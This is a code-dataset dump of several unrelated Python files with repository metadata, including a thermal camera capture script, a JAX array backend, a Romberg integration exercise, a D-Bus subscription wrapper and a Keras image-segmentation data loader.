    # Cameras are re-opened for every sample (ports COM5 / COM6), so each
    # grab starts from a freshly connected device.
    camera1 = Boson(port = "COM5")
    print(camera1.find_serial_device())
    image1 = camera1.grab();
    t1 = camera1.get_fpa_temperature()
    camera1.close()

    camera2 = Boson(port = "COM6")
    image2 = camera2.grab();
    print(camera2.find_serial_device())
    t2 = camera2.get_fpa_temperature()
    camera2.close()

    print('sample #'+str(i)+' temp1 is '+str(t1)+' C, '+'temp2 is '+str(t2)+' C')

    # Record frame, FPA temperature and frame mean for each camera.
    images1.append(image1)
    temp1[i] = t1
    avgs1[i] = np.mean(image1)

    images2.append(image2)
    temp2[i] = t2
    avgs2[i] = np.mean(image2)

    i = i+1;
    if i <samps:
        time.sleep(1)

# Quick visual check: mean signal vs. FPA temperature for both cameras.
plt.plot(temp1,avgs1)
plt.plot(temp2,avgs2)
plt.show()

# create hdf5 file with the raw frames and temperatures for later NUC fits
hf = h5py.File(save_path + name + '.h5', 'w')
hf.create_dataset('images1', data=images1)
hf.create_dataset('temp1', data=temp1)
hf.create_dataset('images2', data=images2)
hf.create_dataset('temp2', data=temp2)
hf.close()
| [
"khart@optics.arizona.edu"
] | khart@optics.arizona.edu |
670361e09280107612186517565f9ae02b2d3f78 | bacad9c336779bacbbb05acb60858b295452dc14 | /9. Pythonicness & Packaging/some_script.py | 30cbe6700017d3a2b84a4dcf763bacc2e11ae837 | [] | no_license | neapps/Python-3-Tutorial | b2a876735fe484dc9322e1189ab811b696b808e1 | 9e76d6d341bc08a98d0adba8981f4cc7d81881b2 | refs/heads/master | 2020-07-30T09:21:54.446276 | 2019-01-20T13:50:16 | 2019-01-20T13:50:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39 | py | import sololearn
sololearn.function2() | [
"muhazharrasyad@gmail.com"
] | muhazharrasyad@gmail.com |
b8b4e649026b77d08e7e7203b0991ac019e4822c | f1d7e7d6501a51213c7a14626a76ae4e2efacf99 | /arraypa/backends/jax.py | 62f602c16f58f82a676ce74aa1c9a860114afe1e | [] | no_license | bchetioui/arraypa | 0cd4c0357199244925fc05722f618315c0c322fa | 530edb18ceb3309bf93ab8d6fe0f8c0563b38a6b | refs/heads/main | 2023-06-08T11:29:39.297501 | 2021-06-28T15:01:20 | 2021-06-28T15:01:20 | 379,742,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 459 | py | from arraypa.core import Backend
import jax.numpy as jnp # type: ignore[import]
class _JaxBackend(Backend):
    """Backend implementation backed by jax.numpy."""

    # Array type used by this backend.
    ArrayTy = jnp.ndarray

    def add(self, lhs, rhs):
        """Element-wise sum of the two operands."""
        return jnp.add(lhs, rhs)

    def mul(self, lhs, rhs):
        """Element-wise product of the two operands."""
        return jnp.multiply(lhs, rhs)

    def cat(self, lhs, rhs):
        """Concatenate the operands along the leading axis."""
        return jnp.concatenate((lhs, rhs))

    def reshape(self, array, new_shape):
        """Return *array* reshaped to *new_shape*."""
        return jnp.reshape(array, new_shape)

# Shared backend instance exported for callers.
jax_backend = _JaxBackend()
| [
"chetioui.benjamin@gmail.com"
] | chetioui.benjamin@gmail.com |
de0d9e57aa229e103b832ce6633de3276c95e900 | 1873cbf7ba52f4a200d2ea45eb936c4e32baed79 | /Numerical_Analysis/Solutions/set13_task5.py | 155c844a155c45a258e611d95367b804f3ae0ab8 | [] | no_license | Tomatosoup97/Notebooks | 80e8cfa99f47a232ce011050252261bfc24a8f3e | 7ec1a0ad323ab9a9fb1ecbb429ce37c80ca64e2d | refs/heads/master | 2020-05-03T06:36:02.353850 | 2019-05-28T11:24:38 | 2019-05-28T11:24:38 | 178,476,943 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | import numpy as np
import math
def romberg(f, a, b, n, R):
    """Fill R with the Romberg integration table for f over [a, b].

    R must be at least (n+1) x (n+1). R[i][0] is the composite trapezoid
    rule with 2**i subintervals and R[i][j] its j-th Richardson
    extrapolation, so R[n][n] is the most accurate estimate. Each row is
    printed as it is computed.

    Fixes vs. the original: the row loop runs i = 1..n (previously it
    started at i = 0, reading R[-1][0] and clobbering the trapezoid seed),
    the midpoint sum includes k = 2**i - 1 (range end was 2**i - 1,
    excluding the last odd node), and the extrapolation loop includes
    j = i (range end was i).
    """
    h = b - a
    # Trapezoid rule on the whole interval seeds the table.
    R[0][0] = 0.5 * h * (f(a) + f(b))
    print(R[0][0])
    for i in range(1, n + 1):
        h *= 0.5
        # Only the new (odd-indexed) nodes of the refined grid need f.
        cur_sum = sum(f(a + k * h) for k in range(1, 2 ** i, 2))
        R[i][0] = 0.5 * R[i - 1][0] + cur_sum * h
        print(R[i][0], end=' ')
        # Richardson extrapolation across the row.
        for j in range(1, i + 1):
            R[i][j] = R[i][j - 1] + (R[i][j - 1] - R[i - 1][j - 1]) / (4 ** j - 1.)
            print(R[i][j], end=' ')
        print('')
def main():
    """Run Romberg integration on three sample integrands, printing each table.

    Robustness fix: a fresh table is allocated for every call so no values
    leak between runs (the original reused one np.zeros array across all
    three integrations, so stale entries from a previous run could be read).
    """
    n = 15
    f = lambda x: 2018*x**5 + 2017*x**4 - 2016*x**3 + 2015*x
    g = lambda x: 1 / (1+x**2)
    h = lambda x: math.cos(2*x) / x
    print('a)')
    romberg(f, -2, 3, n, np.zeros((n+1, n+1)))
    print('\nb)')
    romberg(g, -5, 5, n, np.zeros((n+1, n+1)))
    print('\nc)')
    romberg(h, math.pi, 15, n, np.zeros((n+1, n+1)))
    print('\n')
if __name__ == '__main__':
main()
| [
"mu@qed.ai"
] | mu@qed.ai |
09e5f30c3292cef9d37a74ce9a2db23f11a27306 | 089441983b42b39954da5fae2623d831b41edcc9 | /forms.py | 5c151a0992206423afcd008457063cdaec031790 | [] | no_license | dhruvil3397/Practical-Logicrays | 0b778369107ad33a3f6c16add23b03cbf965b27d | b89ce1089e7c7d13d5a91efa58695cf9cdd3166e | refs/heads/main | 2023-08-07T15:32:35.733397 | 2021-09-16T05:47:24 | 2021-09-16T05:47:24 | 407,035,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | from django import forms
from .models import Get
class ContactForm(forms.ModelForm):
class Meta:
model = Get
fields = ["name","email","mobile"] | [
"noreply@github.com"
] | dhruvil3397.noreply@github.com |
09cf08934e7b30e1f6c77bbea8157410a33d745b | cd90252267040b070412354c6cc12c2aa06f1192 | /containers201/rootfs/usr/share/rhsm/subscription_manager/dbus_interface.py | 155458bc614b7eb56143b6a5d41d0e4a60c9e782 | [] | no_license | gurusus/containers-deep-dive | 2db55a95df41892d50ad64c2b4309a067ac57ac1 | 76b3dbeb21c84d9536dc47660e958da520815b9e | refs/heads/master | 2020-06-27T03:31:09.299433 | 2016-10-04T04:20:09 | 2016-10-04T04:20:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,989 | py | #
# Copyright (c) 2013 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import dbus
import inspect
import logging
import subscription_manager.injection as inj
log = logging.getLogger('rhsm-app.' + __name__)
class DbusIface(object):
    """Wrapper around the com.redhat.SubscriptionManager D-Bus service.

    Degrades gracefully (Python 2 code): if D-Bus is unreachable, or the
    installed python-dbus is too old (RHEL5), the wrapper becomes a no-op.
    """

    service_name = 'com.redhat.SubscriptionManager'

    def __init__(self):
        try:
            # Only follow names if there is a default main loop
            self.has_main_loop = self._get_main_loop() is not None

            self.bus = dbus.SystemBus()
            validity_obj = self._get_validity_object(self.service_name,
                    '/EntitlementStatus',
                    follow_name_owner_changes=self.has_main_loop)
            self.validity_iface = dbus.Interface(validity_obj,
                    dbus_interface='com.redhat.SubscriptionManager.EntitlementStatus')

            # Activate methods now that we're connected
            # Avoids some messy exception handling if dbus isn't installed
            self.update = self._update
        except dbus.DBusException, e:
            # we can't connect to dbus. it's not running, likely from a minimal
            # install. we can't do anything here, so just ignore it.
            log.debug("Unable to connect to dbus")
            log.exception(e)

    def update(self):
        # No-op default; __init__ rebinds this to _update once connected.
        pass

    def _update(self):
        try:
            # Push the current entitlement status to the rhsmd service.
            self.validity_iface.update_status(
                inj.require(inj.CERT_SORTER).get_status_for_icon(),
                ignore_reply=self.has_main_loop)
        except dbus.DBusException, e:
            # Should be unreachable in the gui
            log.debug("Failed to update rhsmd")
            log.exception(e)

    # RHEL5 doesn't support 'follow_name_owner_changes'
    def _get_validity_object(self, *args, **kwargs):
        # Drop the kwarg when the installed python-dbus can't accept it.
        iface_args = inspect.getargspec(self.bus.get_object)[0]
        if 'follow_name_owner_changes' not in iface_args and \
            'follow_name_owner_changes' in kwargs:
            log.debug("installed python-dbus doesn't support 'follow_name_owner_changes'")
            del kwargs['follow_name_owner_changes']
        return self.bus.get_object(*args, **kwargs)

    # RHEL5 doesn't support 'get_default_main_loop'
    def _get_main_loop(self):
        if not hasattr(dbus, "get_default_main_loop"):
            log.debug("installed python-dbus doesn't support 'get_default_main_loop'")
            return None
        return dbus.get_default_main_loop()
| [
"root@rhel7.dc2.crunchtools.com"
] | root@rhel7.dc2.crunchtools.com |
c2a0cc11bd0494b27bfb02ee4621278f7af8f7e2 | fca84e471f3e8f0fc9d923b81fd8408602029760 | /road_traffic/road_hw_mapping.py | 1b421cf3b91ec5b71ab7cbe36fc691b26ca3d5ea | [] | no_license | bass3m/traffic_notify | 9f156b0011e46f020fb89f18132eedf655ca249e | 264dcc2c6b21fd75af4e37a6a8288d951aeebf6d | refs/heads/master | 2021-01-01T06:26:54.067672 | 2013-05-23T04:26:30 | 2013-05-23T04:26:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 82 | py | # probably want to get this from somewhere ?
hw_map = {"Hw 85" : 12,
}
| [
"bassem@outlook.com"
] | bassem@outlook.com |
4d870a6b6efa673364b7659f1e6da51827500560 | aeb69456c4e6f2238c947ae426d346aad033d598 | /python/5.ๆ้ฟๅๆๅญไธฒ.py | aed9593aa7719e8a3cc58e203e3ff0564025083e | [] | no_license | ElonXie/LeetCode-Practice | f2c345cadce8d60515343ee94f52de5f34477d81 | 7a54fc8f85e3e7f937bb504a8f4c6de6dd7da3e2 | refs/heads/master | 2021-05-16T21:09:11.231951 | 2020-06-21T03:39:12 | 2020-06-21T03:39:12 | 250,470,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,450 | py | #
# @lc app=leetcode.cn id=5 lang=python3
#
# [5] ๆ้ฟๅๆๅญไธฒ
#
# https://leetcode-cn.com/problems/longest-palindromic-substring/description/
#
# algorithms
# Medium (29.08%)
# Likes: 1950
# Dislikes: 0
# Total Accepted: 222.4K
# Total Submissions: 762.2K
# Testcase Example: '"babad"'
#
# ็ปๅฎไธไธชๅญ็ฌฆไธฒ s๏ผๆพๅฐ s ไธญๆ้ฟ็ๅๆๅญไธฒใไฝ ๅฏไปฅๅ่ฎพย s ็ๆๅคง้ฟๅบฆไธบ 1000ใ
#
# ็คบไพ 1๏ผ
#
# ่พๅ
ฅ: "babad"
# ่พๅบ: "bab"
# ๆณจๆ: "aba" ไนๆฏไธไธชๆๆ็ญๆกใ
#
#
# ็คบไพ 2๏ผ
#
# ่พๅ
ฅ: "cbbd"
# ่พๅบ: "bb"
#
#
#
# @lc code=start
# class Solution:
# def longestPalindrome(self, s: str) -> str:
# if not s:
# return ''
# # ๆฏไปๅฆๅพ้พๅท
# # 1. dp
# dp = [[False]*len(s) for i in range(len(s))]
# dp[-1][-1] = True
# for i in range(len(s)-2,-1,-1):
# dp[i][i] = True
# dp[i][i+1] = s[i+1]==s[i]
# for j in range(i+2,len(s)):
# dp[i][j] = (dp[i+1][j-1] and s[j]==s[i])
# max_length = -1
# for i in range(len(s)-1,-1,-1):
# for j in range(i,len(s)):
# if dp[i][j]:
# max_index = j
# if max_length<(max_index-i+1):
# max_length = max_index-i+1
# ans = s[i:max_index+1]
# return ans
class Solution:
def longestPalindrome(self, s: str) -> str:
if not s:
return ''
# 2. ็ฎๅ็ฉบ้ด
max_length = 1
ans = s[-1]
# max_index = -1
dp = [False] * len(s)
dp[-1] = True
for i in range(len(s)-2,-1,-1):
# dp[i] = True
max_cur = 0
max_index = i
for j in range(len(s)-1,i+1,-1):
dp[j] = dp[j-1] and (s[i]==s[j])
if dp[j] and (j-i+1>max_cur):
max_cur = j-i+1
max_index = j
if s[i] == s[i+1]:
dp[i+1] = True
if max_cur<2:
# max_index = i+1
max_cur = 2
max_index = i+1
else:
dp[i+1] = False
dp[i] = True
if max_cur>max_length:
ans = s[i:max_index+1]
max_length = max_cur
return ans
# @lc code=end
if __name__ == '__main__':
s = Solution()
s.longestPalindrome("abacab") | [
"sdaxdh@163.com"
] | sdaxdh@163.com |
23f7b483d241fff198b2e52dcceb4f933c06704b | 3cb11b1d88f0ceff0e8e38a414a93e5935887966 | /dedup/distro.py | 6d0cafa807d052882eacd12dec89a25dbe4c8fe8 | [
"WTFPL"
] | permissive | Kahsolt/pic-dedup | 82aaa168f4e2ef4242acb8f5be9ea4d261f4aacc | 91bc2b6e979b57719103b5c62b859311bd37fdd0 | refs/heads/master | 2021-07-11T14:19:04.329014 | 2020-08-14T03:09:14 | 2020-08-14T03:09:14 | 190,917,725 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,527 | py | #!/usr/bin/env python3
import os
import re
import datetime
from . import PACKAGE_PATH
def assemble_distro(fout='dedup_standalone.py'):
_LOCAL_IMPORT_REGEX = re.compile(r'from \..* import .*')
_FILES = [
'__init__.py',
'settings.py',
'models.py',
'imgproc.py',
'utils.py',
'app.py'
]
lines_import, lines_code = set(), list()
for fn in _FILES:
lines_code += ['', '# %s' % fn]
with open(os.path.join(PACKAGE_PATH, fn)) as fp:
lastline = ''
for line in fp.readlines():
line = line.rstrip(' \n\r\t')
if not line and not lastline \
or line.startswith('#!') \
or line.startswith('__all__') \
or _LOCAL_IMPORT_REGEX.findall(line):
continue
elif line.startswith('import') or line.startswith('from'):
lines_import.add(line.lstrip(' \t'))
else:
lines_code.append(line)
lastline = line
with open(fout, 'w+') as fp:
lines = [
'#!/usr/bin/env python3',
'# This file is auto-generated, manual changes should be lost.',
'# build date: %s.' % datetime.datetime.now(),
'',
'__dist__ = "standalone"', # magic sign for detect_env()
'',
] + sorted(list(lines_import)) + lines_code + [
'',
'if __name__ == "__main__":',
' App()'
]
for line in lines:
fp.write(line)
fp.write('\n')
fp.flush()
if __name__ == '__main__':
assemble_distro() | [
"kahsolt@qq.com"
] | kahsolt@qq.com |
eff44ce1869cc6d0c340bdadc54f92b6e8ba7f01 | 817f6b5a69b53599589b798b94efecd8ed1d8e17 | /exercises/1901100282/d07/mymodule/main.py | 2eb3cc635245118bc6dace1675a2ec08d1d02312 | [] | no_license | oneisonly/selfteaching-python-camp | 2422a16c0c9efe787f18fa48833b0bdc8e245982 | 2f26872d31c7392f9530ee1aa7be7958109aaec3 | refs/heads/master | 2020-07-04T23:17:39.750702 | 2019-12-03T04:38:43 | 2019-12-03T04:38:43 | 202,078,442 | 0 | 0 | null | 2019-08-13T06:24:02 | 2019-08-13T06:24:01 | null | UTF-8 | Python | false | false | 3,999 | py | text = '''
ๆๅ
ฌ็งปโผญๅฑฑ
ๅคชโพ่ก๏จ๏ผ็ๅฑโผไบโผญๅฑฑ็ๅ๏ฅฃโพฏ้ข๏ผไฝไบ๏ฆบโผไธๅไนโผๅๆญฒ็โฝผ่๏คด็ฟ๏ผๅๅซๆๅ
ฌใโผไบโผญๅฑฑไฝๅฐๅปฃ้๏ผๆไฝๅป่ทฏ๏คท๏ผไฝฟไป
ๅๅฎถโผไบบๅพไพ๏คญๆฅต็บไธ๏ฅงไพฟ๏ฅฅใ
โผไธๅคฉ๏ผๆๅ
ฌๅฌ้ๅฎถโผไบบ่ชช๏ผใ่ฎๆๅๅ็กๅ
ถโผๅ๏ฆ๏ผๅทๅนณโผไบโผญๅฑฑ๏ผ้ๆข้่ทฏ๏คท๏ผ็ด้่ฑซๅท๏ผไฝ ๅ่ช็บๆ
ๆจฃ๏ผใ
โผคๅคงๅฎถ้ฝ็ฐ๏ฅขโผๅฃๅ่ฒ่ดๆ๏ผๅชๆไป็ๅฆปโผฆๅญ่กจ็คบๆท็๏ผไธฆ่ชช๏ผใไฝ ้ฃ้้ฟโผไธๅโผฉๅฐไธ็โผๅ๏ฆ้๏ฅพ้ฝๆฒๆ๏ผๆ
ๅฏ่ฝๅทๅนณๅคชโพ่ก๏จใ็ๅฑโผไบโผญๅฑฑๅข๏ผๆณไธ๏ผ้ฟๅบ็โผๅโฝฏ็ณโผๅไธๅฐๅช่ฃๅปๅข๏ผใ
โผคๅคงๅฎถ้ฝ็ฑ็๏ฆๅฐ่ชช๏ผใๆโผๅโฝฏ็ณไธ้ฒๆธคๆตท๏ฉ
่ฃใใ
ๆผๆฏๆๅ
ฌๅฐฑๅๅ
ๅญซ๏ผโผไธ่ตท้ๆโผๅ๏ผๆโผๅโฝฏ็ณๆฌ้ๅฐๆธคๆตท๏ฉ
ๅปใ
ๆๅ
ฌ็้ฐๅฑ
ๆฏๅๅฏกๅฉฆ๏ผๆๅๅ
โผฆๅญโผๅ
ซๆญฒไน่่ดๅๅๅฐโพ่ตฐไพ๏คญๅนซๅฟใ
ๅฏไพ๏คญๆๅพ๏ผไปๅ่ฆโผไธๅนด๏ฆๆ่ฝๅพ่ฟๆธคๆตท๏ฉ
โผไธๆฌกใ
ไฝๅจโฟ้ปๆฒณๆฒณ็็ๆบๅ๏ผ็โพ่ฆ๏จไปๅ้ๆจฃโพ่พ่ฆ๏ผๅ็ฌๆๅ
ฌ่ชช๏ผใไฝ ไธ๏ฅงๆฏๅพๆ่ ขๅ๏ผไฝ ๅทฒโผไธๆๅนด๏ฆ็ด
ไบ๏ฆบ๏ผๅฐฑๆฏโฝค็จ็กไฝ ็ๆฐฃโผๅ๏ฆ๏ผไนไธ๏ฅง่ฝๆๅปโผญๅฑฑ็โผไธโป่งๅข๏ผใ
ๆๅ
ฌๆญๆฏ้๏ผใไฝ ๆ้ๆจฃ็ๆโพ่ฆ๏จ๏ผๆฏไธ๏ฅงๆๆโฝฉ็ฝ็ใไฝ โฝๆฏ้ฃๅฏกๅฉฆ็โผฉๅฐๅ
โผฆๅญ้ไธ๏ฅงๅฆๅข๏ผๅฐฑ็ฎๆๆญป
ไบ๏ฆบ๏ผ้ๆๆ็ๅ
โผฆๅญ๏ผๆ็ๅญซโผฆๅญ๏ผๆ็ๆพๅญซโผฆๅญ๏ผไปๅโผไธ็ดๅณไธๅปใโฝฝ่้โผไบโผญๅฑฑๆฏไธ๏ฅงๆๅ โผคๅคง็๏ผ็ธฝๆ
โผไธๅคฉ๏ผๆๅๆๆๅฎๅๅทๅนณใใ
ๆบๅ่ฝไบ๏ฆบ๏ผ็ก่ฉฑๅฏ่ชช๏ผ
โผไบโผญๅฑฑ็ๅฎ่ญท็ฅ่ขซๆๅ
ฌ็ๅ
ๆฏ
็ฒพ็ฅๅๅ๏ผไพฟ๏ฅฅๆๆญคไบๅฅ็ฅๅคฉๅธใๅคฉๅธไฝฉๆๆๅ
ฌ็็ฒพ็ฅ๏ผๅฐฑๅฝๅ
ฉไฝโผคๅคง
โผๅ๏ฆ็ฅๆนโพ่ตฐโผไบโผญๅฑฑใ
How The Foolish Old Man Moved Mountains
Yugong was a ninety-year-old man who lived at the north of two high
mountains, Mount Taixing and Mount Wangwu.
Stretching over a wide expanse of land, the mountains blocked
yugongโs way making it inconvenient for him and his family to get
around.
One day yugong gathered his family together and said,โLetโs do our
best to level these two mountains. We shall open a road that leads
to Yuzhou. What do you think?โ
All but his wife agreed with him.
โYou donโt have the strength to cut even a small mound,โ muttered
his wife. โHow on earth do you suppose you can level Mount Taixin
and Mount Wanwu? Moreover, where will all the earth and rubble go?โ
โDump them into the Sea of Bohai!โ said everyone.
So Yugong, his sons, and his grandsons started to break up rocks and
remove the earth. They transported the earth and rubble to the Sea
of Bohai.
Now Yugongโs neighbour was a widow who had an only child eight years
old. Evening the young boy offered his help eagerly.
Summer went by and winter came. It took Yugong and his crew a full
year to travel back and forth once.
On the bank of the Yellow River dwelled an old man much respected
for his wisdom. When he saw their back-breaking labour, he ridiculed
Yugong saying,โArenโt you foolish, my friend? You are very old now,
and with whatever remains of your waning strength, you wonโt be able
to remove even a corner of the mountain.โ
Yugong uttered a sigh and said,โA biased person like you will never
understand. You canโt even compare with the widowโs little boy!โ
โEven if I were dead, there will still be my children, my
grandchildren, my great grandchildren, my great great grandchildren.
They descendants will go on forever. But these mountains will not
grow any taler. We shall level them one day!โ he declared with
confidence.
The wise old man was totally silenced.
When the guardian gods of the mountains saw how determined Yugong
and his crew were, they were struck with fear and reported the
incident to the Emperor of Heavens.
Filled with admiration for Yugong, the Emperor of Heavens ordered
two mighty gods to carry the mountains away.
'''
import stats_word
stats_word.stats_word(text)
| [
"43633521+liujiayi0042@users.noreply.github.com"
] | 43633521+liujiayi0042@users.noreply.github.com |
aae01e5ea480127d1b556c6aea6273ee7d32d993 | cccf8da8d41ae2c14f5f4313c1edcf03a27956bb | /python/python2latex/writeLTXtextnormal.py | 2f9ea1c10c926e3827f58c7bf4835b22cb57fa58 | [] | no_license | LucaDiStasio/transpilers | e8f8ac4d99be3b42a050148ca8fbc5d025b83290 | c55d4f5240083ffd512f76cd1d39cff1016909b8 | refs/heads/master | 2021-01-12T01:57:00.540331 | 2017-11-01T13:59:55 | 2017-11-01T13:59:55 | 78,448,378 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,293 | py | # Autogenerated with SMOP
from smop.core import *
#
@function
def writeLTXtextnormal(filepath=None,args=None,options=None,*args,**kwargs):
varargin = writeLTXtextnormal.varargin
nargin = writeLTXtextnormal.nargin
##
#==============================================================================
# Copyright (c) 2016-2017 Universite de Lorraine & Lulea tekniska universitet
# Author: Luca Di Stasio <luca.distasio@gmail.com>
# <luca.distasio@ingpec.eu>
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the distribution
# Neither the name of the Universite de Lorraine or Lulea tekniska universitet
# nor the names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#==============================================================================
# DESCRIPTION
#
# A function to create a Latex file.
# Sets normal font. SeeText Formatting.#
##
fileId=fopen(filepath,'a')
fprintf(fileId,'\\n')
line='\\textnormal'
if logical_not(strcmp(options,'none')) and logical_not(strcmp(options,'NONE')) and logical_not(strcmp(options,'None')):
line=strcat(line,'[',options,']')
if logical_not(isempty(args)):
line=strcat(line,'{')
for i in arange(1,length(args)).reshape(-1):
dims=size(args)
if dims[1] == 1 and dims[2] == 1:
line=strcat(line,args[i])
else:
if dims[1] > 1 and dims[2] == 1:
try:
line=strcat(line,args[i][1])
finally:
pass
else:
if dims[1] == 1 and dims[2] > 1:
try:
line=strcat(line,args[1][i])
finally:
pass
else:
line=strcat(line,args[i])
line=strcat(line,'}')
fprintf(fileId,strcat(line,'\\n'))
fclose(fileId)
return | [
"luca.distasio@gmail.com"
] | luca.distasio@gmail.com |
497a0d17e9b80f2eb4684371052158d5097cd94c | 95e4aa7ea67d37c38e521a46d1165a36516338c1 | /data.py | 2e1ac2b545eba7ce84963d97ece829f80d736152 | [] | no_license | ZeyuGaoAi/nucleiSegmentation | e7d0e97fce0b9fa8fd33d1ae2534595bc4afaa37 | c44362a5593d33f99d2a95105c2eecb1a44a3d3f | refs/heads/master | 2020-06-26T14:56:12.548876 | 2019-07-30T14:21:23 | 2019-07-30T14:22:07 | 199,663,940 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,630 | py | from __future__ import print_function
from keras.preprocessing.image import ImageDataGenerator
import numpy as np
import os
import glob
import cv2
import skimage.io as io
import skimage.color as color
import skimage.transform as trans
Sky = [128,128,128]
Building = [128,0,0]
Pole = [192,192,128]
Road = [128,64,128]
Pavement = [60,40,222]
Tree = [128,128,0]
SignSymbol = [192,128,128]
Fence = [64,64,128]
Car = [64,0,128]
Pedestrian = [64,64,0]
Bicyclist = [0,128,192]
Unlabelled = [0,0,0]
COLOR_DICT = np.array([Sky, Building, Pole, Road, Pavement,
Tree, SignSymbol, Fence, Car, Pedestrian, Bicyclist, Unlabelled])
def adjustData(img,mask,flag_multi_class,num_class):
if(flag_multi_class):
img = img / 255
mask = mask[:,:,:,0] if(len(mask.shape) == 4) else mask[:,:,0]
new_mask = np.zeros(mask.shape + (num_class,))
for i in range(num_class):
#for one pixel in the image, find the class in mask and convert it into one-hot vector
#index = np.where(mask == i)
#index_mask = (index[0],index[1],index[2],np.zeros(len(index[0]),dtype = np.int64) + i) if (len(mask.shape) == 4) else (index[0],index[1],np.zeros(len(index[0]),dtype = np.int64) + i)
#new_mask[index_mask] = 1
new_mask[mask == i,i] = 1
new_mask = np.reshape(new_mask,(new_mask.shape[0],new_mask.shape[1]*new_mask.shape[2],new_mask.shape[3])) if flag_multi_class else np.reshape(new_mask,(new_mask.shape[0]*new_mask.shape[1],new_mask.shape[2]))
mask = new_mask
elif(np.max(img) > 1):
img = img / 255
mask = mask /255
mask[mask > 0.5] = 1
mask[mask <= 0.5] = 0
return (img,mask)
def trainGenerator(batch_size,train_path,image_folder,mask_folder,aug_dict,image_color_mode = "grayscale",
mask_color_mode = "grayscale",image_save_prefix = "image",mask_save_prefix = "mask",
flag_multi_class = False,num_class = 2,save_to_dir = None,target_size = (512,512),seed = 1):
'''
can generate image and mask at the same time
use the same seed for image_datagen and mask_datagen to ensure the transformation for image and mask is the same
if you want to visualize the results of generator, set save_to_dir = "your path"
'''
image_datagen = ImageDataGenerator(**aug_dict)
mask_datagen = ImageDataGenerator(**aug_dict)
image_generator = image_datagen.flow_from_directory(
train_path,
classes = [image_folder],
class_mode = None,
color_mode = image_color_mode,
target_size = target_size,
batch_size = batch_size,
save_to_dir = save_to_dir,
save_prefix = image_save_prefix,
seed = seed)
mask_generator = mask_datagen.flow_from_directory(
train_path,
classes = [mask_folder],
class_mode = None,
color_mode = mask_color_mode,
target_size = target_size,
batch_size = batch_size,
save_to_dir = save_to_dir,
save_prefix = mask_save_prefix,
seed = seed)
train_generator = zip(image_generator, mask_generator)
for (img,mask) in train_generator:
img,mask = adjustData(img,mask,flag_multi_class,num_class)
yield (img,mask)
def testGenerator(test_path,num_image = 30,target_size = (512,512),flag_multi_class = False,as_gray = True):
for i in range(num_image):
img = io.imread(os.path.join(test_path,"%d.png"%i),as_gray = as_gray)
if not as_gray:
img = img[:,:,:3]
img = img / 255
img = trans.resize(img,target_size)
img = np.reshape(img,img.shape) if (not flag_multi_class) else img
img = np.reshape(img,(1,)+img.shape)
yield img
def geneTrainNpy(image_path,mask_path,flag_multi_class = False,num_class = 2,image_prefix = "image",mask_prefix = "mask",image_as_gray = True,mask_as_gray = True):
image_name_arr = glob.glob(os.path.join(image_path,"%s*.png"%image_prefix))
image_arr = []
mask_arr = []
for index,item in enumerate(image_name_arr):
img = io.imread(item,as_gray = image_as_gray)
img = np.reshape(img,img.shape + (1,)) if image_as_gray else img
mask = io.imread(item.replace(image_path,mask_path).replace(image_prefix,mask_prefix),as_gray = mask_as_gray)
mask = np.reshape(mask,mask.shape + (1,)) if mask_as_gray else mask
img,mask = adjustData(img,mask,flag_multi_class,num_class)
image_arr.append(img)
mask_arr.append(mask)
image_arr = np.array(image_arr)
mask_arr = np.array(mask_arr)
return image_arr,mask_arr
def labelVisualize(num_class,color_dict,img):
img = img[:,:,0] if len(img.shape) == 3 else img
img_out = np.zeros(img.shape + (3,))
for i in range(num_class):
img_out[img == i,:] = color_dict[i]
return img_out / 255
def saveResult(save_path, npyfile, flag_multi_class = False, num_class = 2):
for index,item in enumerate(npyfile):
img = labelVisualize(num_class,COLOR_DICT,item) if flag_multi_class else item[:,:,0]
labels = np.zeros_like(img)
for i in range(img.shape[0]):
for j in range(img.shape[1]):
if(img[i,j]<0.4):
labels[i,j]=2
elif(img[i,j]<0.75):
labels[i,j]=1
else:
labels[i,j]=0
dst=color.label2rgb(labels)
img = img*255
io.imsave(os.path.join(save_path,"%d_predict_prob.png"%index), img)
